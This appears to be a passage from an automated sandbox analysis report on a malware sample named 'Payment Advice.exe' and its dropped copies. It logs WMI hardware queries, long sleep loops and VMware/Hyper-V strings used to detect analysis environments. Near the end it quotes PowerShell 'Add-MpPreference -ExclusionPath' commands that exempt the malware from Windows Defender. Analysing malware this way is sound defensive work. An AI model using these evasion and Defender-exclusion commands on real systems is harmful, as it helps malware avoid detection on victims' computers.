                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 99653Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 99530Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 99422Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 99312Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 99201Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 99049Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98922Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98812Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98703Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98594Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98484Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98375Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98266Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98156Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 98044Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 97937Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 97828Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 97714Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 97559Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 97453Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 97332Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 97203Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 97093Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96984Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96874Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96766Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96641Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96531Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96421Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96312Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96203Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 96094Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95984Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95875Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95766Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95656Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95547Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95437Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95328Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95219Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95109Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 95000Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 94891Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 94781Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 94672Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 94562Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 94453Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 94344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 99874
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 99545
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 99218
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 99109
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98996
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98890
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98780
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98671
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98562
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98453
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98343
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98234
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98117
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 98015
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97906
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97796
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97687
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97578
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97466
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97359
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97249
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97139
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 97030
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96921
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96812
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96702
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96593
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96484
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96374
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96265
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96156
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 96044
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 95937
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 95812
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 93076
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92965
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92858
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92744
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92640
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92530
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92421
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92292
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92148
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 92035
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeThread delayed: delay time: 91912
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99827
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99718
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99609
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99498
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99390
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99281
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99172
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99062
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98953
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98844
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98734
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98624
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98515
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98406
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98296
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98186
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98078
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97968
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97859
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97749
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97640
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97531
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97421
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97312
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97203
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97093
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96984
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96875
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96765
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96655
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96547
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96437
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96328
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96218
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96109
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95890
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95779
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95672
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95562
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95453
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95343
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95234
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95125
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95015
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94906
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94797
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94687
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99874
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99766
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99547
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99438
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99313
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99188
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99078
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98969
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98844
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98110
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97110
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96110
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95113
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94619
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94516
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94406
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94268
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199958
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199828
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199719
                    Source: BjTxJte.exe, 0000000E.00000002.1848048895.0000000000872000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
                    Source: BjTxJte.exe, 00000014.00000002.1936987872.0000000005500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: BjTxJte.exe, 0000000E.00000002.1848048895.0000000000872000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: sFPEKzHsLkYZIz.exe, 00000009.00000002.1754542531.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8
                    Source: BjTxJte.exe, 00000019.00000002.4119037268.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                    Source: Payment Advice.exe, 00000000.00000002.1706697674.00000000012D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:L
                    Source: Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"Jump to behavior
                    Injects a PE file into a foreign processes
